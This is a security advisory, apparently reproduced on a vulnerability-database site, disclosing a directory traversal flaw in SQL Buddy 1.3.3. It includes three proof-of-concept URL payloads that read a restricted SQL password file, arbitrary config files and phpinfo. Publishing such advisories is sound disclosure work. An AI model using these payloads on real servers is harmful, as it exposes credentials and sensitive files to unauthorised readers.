Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32036
HistoryMay 11, 2015 - 12:00 a.m.

Sqlbuddy Path Traversal Vulnerability

2015-05-1100:00:00
vulners.com
98
JSON

Exploit Author: John Page (hyp3rlinx)
Website: hyp3rlinx.altervista.org/
Vendor Homepage: www.sqlbuddy.com
Version: 1.3.3

SQL Buddy is an open source web based MySQL administration application.

Advisory Information: ================== sqlbuddy suffers from directory traversal whereby a user can move about directories an read any PHP and non PHP files by appending the '#' hash character when requesting files via URLs. e.g. .doc, .txt, .xml, .conf, .sql etc… After adding the '#' character as a delimiter any non PHP will be returned and rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method. Normal sqlbuddy request: http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx> POC

Exploit payloads: ======================= 1-Read from Apache restricted directory under htdocs: http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any arbitrary files that do not have .PHP extensions: http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read phpinfo (no need for '#' as phpinfo is a PHP file): http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo

Severity Level: =============== High

Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable Parameter(s): [+] #page=somefile Affected Area(s): [+] Server directories & sensitive files Solution - Fix &

Patch: ======================= N/A

JSON